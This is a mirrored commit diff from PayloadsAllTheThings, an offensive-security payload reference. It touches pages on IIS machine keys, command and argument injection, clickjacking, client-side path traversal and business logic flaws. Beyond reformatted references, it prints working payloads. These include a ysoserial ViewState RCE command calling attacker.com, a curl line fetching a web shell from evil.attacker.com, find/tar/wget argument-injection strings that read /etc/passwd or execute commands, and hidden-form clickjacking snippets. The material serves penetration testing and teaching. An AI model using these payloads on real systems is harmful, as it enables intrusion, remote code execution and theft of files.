ch0ic3/PayloadsAllTheThings
1
0
Fork 0
mirror of https://github.com/swisskyrepo/PayloadsAllTheThings.git synced 2024-12-18 10:26:09 +00:00
Code Issues Actions Packages Projects Releases Wiki Activity

References updated for API, Business, Clickjacking, CSPT, Command

Browse Source 
Injection
This commit is contained in:
Swissky 2024-11-04 16:35:24 +01:00
parent 138fbd97f9
commit 4dc409d31e
7 changed files with 113 additions and 172 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

36
API Key Leaks/IIS-Machine-Keys.md
View File

@ -2,6 +2,20 @@
> That machine key is used for encryption and decryption of forms authentication cookie data and view-state data, and for verification of out-of-process session state identification.
## Summary
* [Viewstate Format](#viewstate-format)
* [Machine Key Format And Locations](#machine-key-format-and-locations)
* [Identify Known Machine Key](#identify-known-machine-key)
* [Decode ViewState](#decode-viewstate)
* [Generate ViewState For RCE](#generate-viewstate-for-rce)
* [MAC Is Not Enabled](#mac-is-not-enabled)
* [MAC Is Enabled And Encryption Is Disabled](#mac-is-enabled-and-encryption-is-disabled)
* [MAC Is Enabled And Encryption Is Enabled](#mac-is-enabled-and-encryption-is-enabled)
* [Edit Cookies With The Machine Key](#edit-cookies-with-the-machine-key)
* [References](#references)
**Requirements**
* `__VIEWSTATE`
@ -22,7 +36,7 @@ By default until Sept 2014, the `enableViewStateMac` property was to set to `Fal
Usually unencrypted viewstate are starting with the string `/wEP`.
## Machine Key Format and Locations
## Machine Key Format And Locations
A machineKey in IIS is a configuration element in ASP.NET that specifies cryptographic keys and algorithms used for encrypting and validating data, such as view state and forms authentication tokens. It ensures consistency and security across web applications, especially in web farm environments.
@ -59,7 +73,7 @@ Common locations of **web.config** / **machine.config**
* `HKEY_CURRENT_USER\Software\Microsoft\ASP.NET\2.0.50727.0\AutoGenKey`
## Identify known machine key
## Identify Known Machine Key
Try multiple machine keys from known products, Microsoft documentation, or other part of the Internet.
@ -117,18 +131,18 @@ List of interesting machine keys to use:
```
## Generate ViewState for RCE
## Generate ViewState For RCE
First you need to decode the Viewstate to know if the MAC and the encryption are enabled.
### MAC is not enabled
### MAC Is Not Enabled
```ps1
ysoserial.exe -o base64 -g TypeConfuseDelegate -f ObjectStateFormatter -c "powershell.exe Invoke-WebRequest -Uri http://attacker.com/:UserName"
```
### MAC is enabled and Encryption is disabled
### MAC Is Enabled And Encryption Is Disabled
* Find the machine key (validationkey) using `badsecrets`, `viewstalker`, `AspDotNetWrapper.exe` or `viewgen`
```ps1
@ -147,7 +161,7 @@ ysoserial.exe -o base64 -g TypeConfuseDelegate -f ObjectStateFormatter -c "power
```
### MAC is enabled and Encryption is enabled
### MAC Is Enabled And Encryption Is Enabled
Default validation algorithm is `HMACSHA256` and the default decryption algorithm is `AES`.
@ -164,7 +178,7 @@ If the `__VIEWSTATEGENERATOR` is missing but the application uses .NET Framework
```
## Edit cookies with the machine key
## Edit Cookies With The Machine Key
If you have the `machineKey` but the viewstate is disabled.
@ -181,8 +195,8 @@ $ AspDotNetWrapper.exe --decryptDataFilePath C:\DecryptedText.txt
## References
* [Deep Dive into .NET ViewState Deserialization and Its Exploitation - Swapneil Kumar Dash - October 22, 2019](https://swapneildash.medium.com/deep-dive-into-net-viewstate-deserialization-and-its-exploitation-54bf5b788817)
* [Exploiting Deserialisation in ASP.NET via ViewState - Soroush Dalili - April 23, 2019](https://soroush.me/blog/2019/04/exploiting-deserialisation-in-asp-net-via-viewstate/)
* [Exploiting ViewState Deserialization using Blacklist3r and YSoSerial.Net - claranet - 13/06/2019](https://www.claranet.com/us/blog/2019-06-13-exploiting-viewstate-deserialization-using-blacklist3r-and-ysoserialnet)
* [View State, The unpatchable IIS forever day being actively exploited - zeroed.tech - 21-7-2024](https://zeroed.tech/blog/viewstate-the-unpatchable-iis-forever-day-being-actively-exploited/)
* [Project Blacklist3r - November 23, 2018 - @notsosecure](https://www.notsosecure.com/project-blacklist3r/)
* [Deep Dive into .NET ViewState deserialization and its exploitation - Swapneil Kumar Dash - Oct 22, 2019](https://swapneildash.medium.com/deep-dive-into-net-viewstate-deserialization-and-its-exploitation-54bf5b788817)
* [Exploiting ViewState Deserialization using Blacklist3r and YSoSerial.Net - Claranet - June 13, 2019](https://www.claranet.com/us/blog/2019-06-13-exploiting-viewstate-deserialization-using-blacklist3r-and-ysoserialnet)
* [Project Blacklist3r - @notsosecure - November 23, 2018](https://www.notsosecure.com/project-blacklist3r/)
* [View State, The Unpatchable IIS Forever Day Being Actively Exploited - Zeroed - July 21, 2024](https://zeroed.tech/blog/viewstate-the-unpatchable-iis-forever-day-being-actively-exploited/)

9
API Key Leaks/README.md
View File

@ -166,8 +166,7 @@ A Mapbox API Token is a JSON Web Token (JWT). If the header of the JWT is `sk`,
## References
* [Finding Hidden API Keys & How to use them - Sumit Jain - August 24, 2019](https://medium.com/@sumitcfe/finding-hidden-api-keys-how-to-use-them-11b1e5d0f01d)
* [Private API key leakage due to lack of access control - yox - August 8, 2018](https://hackerone.com/reports/376060)
* [Saying Goodbye to my Favorite 5 Minute P1 - Allyson O'Malley - January 6, 2020](https://www.allysonomalley.com/2020/01/06/saying-goodbye-to-my-favorite-5-minute-p1/)
* [Mapbox API Token Documentation](https://docs.mapbox.com/help/troubleshooting/how-to-use-mapbox-securely/)
* [Introducing SignSaboteur: forge signed web tokens with ease - Zakhar Fedotkin - 22 May 2024](https://portswigger.net/research/introducing-signsaboteur-forge-signed-web-tokens-with-ease)
* [Finding Hidden API Keys & How to Use Them - Sumit Jain - August 24, 2019](https://web.archive.org/web/20191012175520/https://medium.com/@sumitcfe/finding-hidden-api-keys-how-to-use-them-11b1e5d0f01d)
* [Introducing SignSaboteur: Forge Signed Web Tokens with Ease - Zakhar Fedotkin - May 22, 2024](https://portswigger.net/research/introducing-signsaboteur-forge-signed-web-tokens-with-ease)
* [Private API Key Leakage Due to Lack of Access Control - yox - August 8, 2018](https://hackerone.com/reports/376060)
* [Saying Goodbye to My Favorite 5 Minute P1 - Allyson O'Malley - January 6, 2020](https://www.allysonomalley.com/2020/01/06/saying-goodbye-to-my-favorite-5-minute-p1/)

120
Argument Injection/README.md
View File

@ -1,120 +0,0 @@
# Argument Injection
Argument injection is similar to command injection as tainted data is passed to to a command executed in a shell without proper sanitization/escaping.
It can happen in different situations, where you can only inject arguments to a command:
- Improper sanitization (regex)
- Injection of arguments into a fixed command (PHP:escapeshellcmd, Python: Popen)
- Bash expansion (ex: *)
In the following example, a python script takes the inputs from the command line to generate a ```curl``` command:*
```py
from shlex import quote,split
import sys
import subprocess
if __name__=="__main__":
command = ['curl']
command = command + split(sys.argv[1])
print(command)
r = subprocess.Popen(command)
```
It is possible for an attacker to pass several words to abuse options from ```curl``` command
```ps1
python python_rce.py "https://www.google.fr -o test.py"
```
We can see by printing the command that all the parameters are split allowing to inject an argument that will save the response in an arbitrary file.
```ps1
['curl', 'https://www.google.fr', '-o', 'test.py']
```
## Summary
* [List of exposed commands](#list-of-exposed-commands)
* [CURL](#CURL)
* [TAR](#TAR)
* [FIND](#FIND)
* [WGET](#WGET)
* [References](#references)
## List of exposed commands
### CURL
It is possible to abuse ```curl``` through the following options:
```ps1
-o, --output <file> Write to file instead of stdout
-O, --remote-name Write output to a file named as the remote file
```
In case there is already one option in the command it is possible to inject several URLs to download and several output options. Each option will affect each URL in sequence.
### TAR
For the ```tar``` command it is possible to inject arbitrary arguments in different commands.
Argument injection can happen into the '''extract''' command:
```ps1
--to-command <command>
--checkpoint=1 --checkpoint-action=exec=<command>
-T <file> or --files-from <file>
```
Or in the '''create''' command:
```ps1
-I=<program> or -I <program>
--use-compres-program=<program>
```
There are also short options to work without spaces:
```ps1
-T<file>
-I"/path/to/exec"
```
### FIND
Find some_file inside /tmp directory.
```php
$file = "some_file";
system("find /tmp -iname ".escapeshellcmd($file));
```
Print /etc/passwd content.
```php
$file = "sth -or -exec cat /etc/passwd ; -quit";
system("find /tmp -iname ".escapeshellcmd($file));
```
### WGET
Example of vulnerable code
```php
system(escapeshellcmd('wget '.$url));
```
Arbitrary file write
```php
$url = '--directory-prefix=/var/www/html http://example.com/example.php';
```
## References
- [staaldraad - Etienne Stalmans, November 24, 2019](https://staaldraad.github.io/post/2019-11-24-argument-injection/)
- [Back To The Future: Unix Wildcards Gone Wild - Leon Juranic, 06/25/2014](https://www.exploit-db.com/papers/33930)
- [TL;DR: How exploit/bypass/use PHP escapeshellarg/escapeshellcmd functions - kacperszurek, Apr 25, 2018](https://github.com/kacperszurek/exploits/blob/master/GitList/exploit-bypass-php-escapeshellarg-escapeshellcmd.md)

15
Business Logic Errors/README.md
View File

@ -6,6 +6,14 @@
## Summary
* [Examples](#examples)
* [Review Feature Testing](#review-feature-testing)
* [Discount Code Feature Testing](#discount-code-feature-testing)
* [Delivery Fee Manipulation](#delivery-fee-manipulation)
* [Currency Arbitrage](#currency-arbitrage)
* [Premium Feature Exploitation](#premium-feature-exploitation)
* [Refund Feature Exploitation](#refund-feature-exploitation)
* [Cart/Wishlist Exploitation](#cartwishlist-exploitation)
* [Thread Comment Testing](#thread-comment-testing)
* [References](#references)
@ -77,6 +85,7 @@ Common examples of Business Logic Errors.
## References
* [Business logic vulnerability - OWASP](https://owasp.org/www-community/vulnerabilities/Business_logic_vulnerability)
* [Business logic vulnerabilities - PortSwigger](https://portswigger.net/web-security/logic-flaws)
* [Examples of business logic vulnerabilities - PortSwigger](https://portswigger.net/web-security/logic-flaws/examples)
- [Business Logic Vulnerabilities - PortSwigger - 2024](https://portswigger.net/web-security/logic-flaws)
- [Business Logic Vulnerability - OWASP - 2024](https://owasp.org/www-community/vulnerabilities/Business_logic_vulnerability)
- [CWE-840: Business Logic Errors - CWE - March 24, 2011](https://cwe.mitre.org/data/definitions/840.html)
- [Examples of Business Logic Vulnerabilities - PortSwigger - 2024](https://portswigger.net/web-security/logic-flaws/examples)

59
Clickjacking/README.md
View File

@ -1,4 +1,4 @@
# Clickjacking: Web Application Security Vulnerability
# Clickjacking
> Clickjacking is a type of web security vulnerability where a malicious website tricks a user into clicking on something different from what the user perceives,
> potentially causing the user to perform unintended actions without their knowledge or consent. Users are tricked into performing all sorts of unintended actions
@ -6,25 +6,27 @@
> that a normal user can do on a legitimate website can be done using clickjacking.
## Summary
* [Tools](#tools)
* [Methodology](#methodology)
* [UI Redressing](#ui-redressing)
* [Invisible Frames](#invisible-frames)
* [Button/Form Hijacking](#buttonform-hijacking)
* [Execution Methods](#execution-methods)
* [UI Redressing](#ui-redressing)
* [Invisible Frames](#invisible-frames)
* [Button/Form Hijacking](#buttonform-hijacking)
* [Execution Methods](#execution-methods)
* [Preventive Measures](#preventive-measures)
* [Implement X-Frame-Options Header](#implement-x-frame-options-header)
* [Content Security Policy (CSP)](#content-security-policy-csp)
* [Disabling JavaScript](#disabling-javascript)
* [Implement X-Frame-Options Header](#implement-x-frame-options-header)
* [Content Security Policy (CSP)](#content-security-policy-csp)
* [Disabling JavaScript](#disabling-javascript)
* [OnBeforeUnload Event](#onbeforeunload-event)
* [XSS Filter](#xss-filter)
* [IE8 XSS filter](#ie8-xss-filter)
* [Chrome 4.0 XSSAuditor filter](#chrome-40-xssauditor-filter)
* [IE8 XSS filter](#ie8-xss-filter)
* [Chrome 4.0 XSSAuditor filter](#chrome-40-xssauditor-filter)
* [Challenge](#challenge)
* [Practice Environments](#practice-environments)
* [Reference](#references)
## Tools
* [Burp Suite](https://portswigger.net/burp)
* [OWASP ZAP](https://github.com/zaproxy/zaproxy)
* [Clickjack](https://github.com/machine1337/clickjack)
@ -32,9 +34,11 @@
## Methodology
### UI Redressing
UI Redressing is a Clickjacking technique where an attacker overlays a transparent UI element on top of a legitimate website or application.
The transparent UI element contains malicious content or actions that are visually hidden from the user. By manipulating the transparency and positioning of elements,
the attacker can trick the user into interacting with the hidden content, believing they are interacting with the visible interface.
* **How UI Redressing Works:**
* Overlaying Transparent Element: The attacker creates a transparent HTML element (usually a `<div>`) that covers the entire visible area of a legitimate website. This element is made transparent using CSS properties like `opacity: 0;`.
* Positioning and Layering: By setting the CSS properties such as `position: absolute; top: 0; left: 0;`, the transparent element is positioned to cover the entire viewport. Since it's transparent, the user doesn't see it.
@ -47,11 +51,13 @@ the attacker can trick the user into interacting with the hidden content, believ
```
### Invisible Frames
Invisible Frames is a Clickjacking technique where attackers use hidden iframes to trick users into interacting with content from another website unknowingly.
These iframes are made invisible by setting their dimensions to zero (height: 0; width: 0;) and removing their borders (border: none;).
The content inside these invisible frames can be malicious, such as phishing forms, malware downloads, or any other harmful actions.
* **How Invisible Frames Work:**
* Hidden IFrame Creation: The attacker includes an `<iframe>` element in a webpage, setting its dimensions to zero and removing its border, making it invisible to the user.
```html
<iframe src="malicious-site" style="opacity: 0; height: 0; width: 0; border: none;"></iframe>
@ -62,6 +68,7 @@ The content inside these invisible frames can be malicious, such as phishing for
### Button/Form Hijacking
Button/Form Hijacking is a Clickjacking technique where attackers trick users into interacting with invisible or hidden buttons/forms, leading to unintended actions on a legitimate website. By overlaying deceptive elements on top of visible buttons or forms, attackers can manipulate user interactions to perform malicious actions without the user's knowledge.
* **How Button/Form Hijacking Works:**
@ -89,39 +96,47 @@ Button/Form Hijacking is a Clickjacking technique where attackers trick users in
```
### Execution Methods
* Creating Hidden Form: The attacker creates a hidden form containing malicious input fields, targeting a vulnerable action on the victim's website. This form remains invisible to the user.
```html
<form action="malicious-site" method="POST" id="hidden-form" style="display: none;">
<input type="hidden" name="username" value="attacker">
<input type="hidden" name="action" value="transfer-funds">
</form>
```
* Overlaying Visible Element: The attacker overlays a visible element (button or form) on their malicious page, encouraging users to interact with it. When the user clicks the visible element, they unknowingly trigger the hidden form's submission.
* Example in javascript:
```js
```js
function submitForm() {
document.getElementById('hidden-form').submit();
}
```
document.getElementById('hidden-form').submit();
}
```
## Preventive Measures
### Implement X-Frame-Options Header
Implement the X-Frame-Options header with the DENY or SAMEORIGIN directive to prevent your website from being embedded within an iframe without your consent.
```apache
Header always append X-Frame-Options SAMEORIGIN
```
### Content Security Policy (CSP)
Use CSP to control the sources from which content can be loaded on your website, including scripts, styles, and frames.
Define a strong CSP policy to prevent unauthorized framing and loading of external resources.
Example in HTML meta tag:
```html
<meta http-equiv="Content-Security-Policy" content="frame-ancestors 'self';">
```
### Disabling JavaScript
* Since these type of client side protections relies on JavaScript frame busting code, if the victim has JavaScript disabled or it is possible for an attacker to disable JavaScript code, the web page will not have any protection mechanism against clickjacking.
* There are three deactivation techniques that can be used with frames:
* Restricted frames with Internet Explorer: Starting from IE6, a frame can have the "security" attribute that, if it is set to the value "restricted", ensures that JavaScript code, ActiveX controls, and re-directs to other sites do not work in the frame.
@ -134,6 +149,7 @@ Example in HTML meta tag:
```
## OnBeforeUnload Event
* The `onBeforeUnload` event could be used to evade frame busting code. This event is called when the frame busting code wants to destroy the iframe by loading the URL in the whole web page and not only in the iframe. The handler function returns a string that is prompted to the user asking confirm if he wants to leave the page. When this string is displayed to the user is likely to cancel the navigation, defeating targets frame busting attempt.
* The attacker can use this attack by registering an unload event on the top page using the following example code:
@ -192,6 +208,7 @@ This filter has visibility into all parameters of each request and response flow
```
### Chrome 4.0 XSSAuditor filter
It has a little different behaviour compared to IE8 XSS filter, in fact with this filter an attacker could deactivate a “script” by passing its code in a request parameter. This enables the framing page to specifically target a single snippet containing the frame busting code, leaving all the other codes intact.
Attacker View:
```html
@ -199,6 +216,7 @@ It has a little different behaviour compared to IE8 XSS filter, in fact with thi
```
## Challenge
Inspect the following code:
```html
<div style="position: absolute; opacity: 0;">
@ -206,16 +224,19 @@ Inspect the following code:
</div>
<button onclick="document.getElementsByTagName('iframe')[0].contentWindow.location='malicious-site.com';">Click me</button>
```
Determine the Clickjacking vulnerability within this code snippet. Identify how the hidden iframe is being used to exploit the user's actions when they click the button, leading them to a malicious website.
## Practice Environments
* [OWASP WebGoat](https://owasp.org/www-project-webgoat/)
* [Client Side Clickjacking Test](https://owasp.org/www-project-web-security-testing-guide/v41/4-Web_Application_Security_Testing/11-Client_Side_Testing/09-Testing_for_Clickjacking)
## References
* [Clickjacker.io - Saurabh Banawar](https://clickjacker.io)
* [Web-Security Clickjacking - PortSwigger](https://portswigger.net/web-security/clickjacking)
* [Synopsys Clickjacking](https://www.synopsys.com/glossary/what-is-clickjacking.html#B)
* [OWASP - Gustav Rydstedt](https://owasp.org/www-community/attacks/Clickjacking)
* [SecTheory](http://www.sectheory.com/clickjacking.htm)
- [Clickjacker.io - Saurabh Banawar - May 10, 2020](https://clickjacker.io)
- [Clickjacking - Gustav Rydstedt - April 28, 2020](https://owasp.org/www-community/attacks/Clickjacking)
- [Synopsys Clickjacking - BlackDuck - November 29, 2019](https://www.synopsys.com/glossary/what-is-clickjacking.html#B)
- [Web-Security Clickjacking - PortSwigger - October 12, 2019](https://portswigger.net/web-security/clickjacking)

23
Client Side Path Traversal/README.md
View File

@ -4,6 +4,14 @@ Client-Side Path Traversal (CSPT), sometimes also referred to as "On-site Reques
It takes advantage of the client side's ability to make requests using fetch to a URL, where multiple "../" characters can be injected. After normalization, these characters redirect the request to a different URL, potentially leading to security breaches.
Since every request is initiated from within the frontend of the application, the browser automatically includes cookies and other authentication mechanisms, making them available for exploitation in these attacks.
## Summary
* [Tools](#tools)
* [Lab](#lab)
* [CSPT to XSS](#cspt-to-xss)
* [CSPT to CSRF](#cspt-to-xss)
* [References](#references)
## Tools
@ -54,11 +62,10 @@ Real-World Scenarios:
## References
* [Exploiting Client-Side Path Traversal to Perform Cross-Site Request Forgery - Introducing CSPT2CSRF - Maxence Schmitt - 02 Jul 2024](https://blog.doyensec.com/2024/07/02/cspt2csrf.html)
* [Exploiting Client-Side Path Traversal - CSRF is dead, long live CSRF - Whitepaper- Maxence Schmitt](https://www.doyensec.com/resources/Doyensec_CSPT2CSRF_Whitepaper.pdf)
* [Exploiting Client-Side Path Traversal - CSRF is Dead, Long Live CSRF - OWASP Global AppSec 2024 - Maxence Schmitt - June 24 2024](https://www.doyensec.com/resources/Doyensec_CSPT2CSRF_OWASP_Appsec_Lisbon.pdf)
* [Leaking Jupyter instance auth token chaining CVE-2023-39968, CVE-2024-22421 and a chromium bug - Davwwwx - 30-08-2023](https://blog.xss.am/2023/08/cve-2023-39968-jupyter-token-leak/)
* [Tweet - @HusseiN98D - 5 july 2024](https://twitter.com/HusseiN98D/status/1809164551822172616)
* [On-site request forgery - Dafydd Stuttard - 03 May 2007](https://portswigger.net/blog/on-site-request-forgery)
* [Bypassing WAFs to Exploit CSPT Using Encoding Levels - Matan Berson - 2024-05-10](https://matanber.com/blog/cspt-levels)
* [Automating Client-Side Path Traversals Discovery - Vitor Falcao - October 3, 2024](https://vitorfalcao.com/posts/automating-cspt-discovery/)
- [Exploiting Client-Side Path Traversal to Perform Cross-Site Request Forgery - Introducing CSPT2CSRF - Maxence Schmitt - 02 Jul 2024](https://blog.doyensec.com/2024/07/02/cspt2csrf.html)
- [Exploiting Client-Side Path Traversal - CSRF is dead, long live CSRF - Whitepaper - Maxence Schmitt - 02 Jul 2024](https://www.doyensec.com/resources/Doyensec_CSPT2CSRF_Whitepaper.pdf)
- [Exploiting Client-Side Path Traversal - CSRF is Dead, Long Live CSRF - OWASP Global AppSec 2024 - Maxence Schmitt - June 24 2024](https://www.doyensec.com/resources/Doyensec_CSPT2CSRF_OWASP_Appsec_Lisbon.pdf)
- [Leaking Jupyter instance auth token chaining CVE-2023-39968, CVE-2024-22421 and a chromium bug - Davwwwx - 30-08-2023](https://blog.xss.am/2023/08/cve-2023-39968-jupyter-token-leak/)
- [On-site request forgery - Dafydd Stuttard - 03 May 2007](https://portswigger.net/blog/on-site-request-forgery)
- [Bypassing WAFs to Exploit CSPT Using Encoding Levels - Matan Berson - 2024-05-10](https://matanber.com/blog/cspt-levels)
- [Automating Client-Side Path Traversals Discovery - Vitor Falcao - October 3, 2024](https://vitorfalcao.com/posts/automating-cspt-discovery/)

23
Command Injection/README.md
View File

@ -122,6 +122,14 @@ Use this website [Argument Injection Vectors - Sonar](https://sonarsource.github
psql -o'|id>/tmp/foo'
```
Sometimes, direct command execution from the injection might not be possible, but you may be able to redirect the flow into a specific file, enabling you to deploy a web shell.
* curl
```ps1
# -o, --output <file> Write to file instead of stdout
curl http://evil.attacker.com/ -o webshell.php
```
### Inside a command
@ -427,9 +435,12 @@ g="/e"\h"hh"/hm"t"c/\i"sh"hh/hmsu\e;tac$@<${g//hh??hm/}
## References
* [SECURITY CAFÉ - Exploiting Timed Based RCE](https://securitycafe.ro/2017/02/28/time-based-data-exfiltration/)
* [Bug Bounty Survey - Windows RCE spaceless](https://web.archive.org/web/20180808181450/https://twitter.com/bugbsurveys/status/860102244171227136)
* [No PHP, no spaces, no $, no { }, bash only - @asdizzle](https://twitter.com/asdizzle_/status/895244943526170628)
* [#bash #obfuscation by string manipulation - Malwrologist, @DissectMalware](https://twitter.com/DissectMalware/status/1025604382644232192)
* [What is OS command injection - portswigger](https://portswigger.net/web-security/os-command-injection)
* [Argument Injection Vectors - Sonar](https://sonarsource.github.io/argument-injection-vectors/)
- [Argument Injection and Getting Past Shellwords.escape - Etienne Stalmans - November 24, 2019](https://staaldraad.github.io/post/2019-11-24-argument-injection/)
- [Argument Injection Vectors - SonarSource - February 21, 2023](https://sonarsource.github.io/argument-injection-vectors/)
- [Back to the Future: Unix Wildcards Gone Wild - Leon Juranic - June 25, 2014](https://www.exploit-db.com/papers/33930)
- [Bash Obfuscation by String Manipulation - Malwrologist, @DissectMalware - August 4, 2018](https://twitter.com/DissectMalware/status/1025604382644232192)
- [Bug Bounty Survey - Windows RCE Spaceless - Bug Bounties Survey - May 4, 2017](https://web.archive.org/web/20180808181450/https://twitter.com/bugbsurveys/status/860102244171227136)
- [No PHP, No Spaces, No $, No {}, Bash Only - Sven Morgenroth - August 9, 2017](https://twitter.com/asdizzle_/status/895244943526170628)
- [OS Command Injection - PortSwigger - 2024](https://portswigger.net/web-security/os-command-injection)
- [SECURITY CAFÉ - Exploiting Timed-Based RCE - Pobereznicenco Dan - February 28, 2017](https://securitycafe.ro/2017/02/28/time-based-data-exfiltration/)
- [TL;DR: How to Exploit/Bypass/Use PHP escapeshellarg/escapeshellcmd Functions - kacperszurek - April 25, 2018](https://github.com/kacperszurek/exploits/blob/master/GitList/exploit-bypass-php-escapeshellarg-escapeshellcmd.md)